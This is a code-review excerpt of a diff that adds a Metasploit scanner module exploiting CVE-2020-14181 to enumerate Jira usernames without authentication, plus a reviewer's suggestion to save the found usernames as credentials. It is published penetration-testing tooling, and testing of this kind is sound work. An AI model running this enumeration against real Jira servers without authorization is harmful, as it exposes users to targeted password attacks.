modules/auxiliary/scanner/http/jira_user_enum.rb

```diff
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jira Users Enumeration',
+        'Description' => %q{
+          This module exploits an information disclosure vulnerability that allows an
+          unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint.
+          This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
+          Discovered by Mikhail Klyuchnikov @__mn1__
+          This module was only tested on 8.4.1
+        },
+        'Author' => [ 'Brian Halbach' ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['URL', 'https://jira.atlassian.com/browse/JRASERVER-71560'],
+            ['CVE', '2020-14181'],
+          ],
+        'DisclosureDate' => '2020-08-16'
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Jira Path', '/']),
+      ]
+    )
+    deregister_options('PASS_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'STOP_ON_SUCCESS', 'BLANK_PASSWORDS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'PASSWORD')
+  end
+
+  def base_uri
+    @base_uri ||= normalize_uri("#{target_uri.path}/secure/ViewUserHover.jspa?username=")
+  end
+
+  def do_user_enum(user)
+    print_status("Begin enumerating user at #{vhost}#{base_uri}")
+    print_status("checking user #{user}")
+    res = send_request_cgi!(
+      'uri' => "#{base_uri}#{user}",
+      'method' => 'GET',
+      'headers' => { 'Connection' => 'Close' }
+    )
+    if res.body.include?('User does not exist')
+      print_bad("'User #{user} does not exist'")
+    elsif res.body.include?('<a id="avatar-full-name-link"') # this works for 8.4.1 not sure about other verions
+      print_good("'User exists: #{user}'")
```

Comment:
```suggestion
      connection_details = {
        module_fullname: fullname,
        username: user,
        workspace_id: myworkspace_id,
        status: Metasploit::Model::Login::Status::UNTRIED
      }.merge(service_details)
      create_credential_and_login(connection_details)
      print_good("'User exists: #{user}'")
```
I believe this should work to store the usernames as credentials in the database.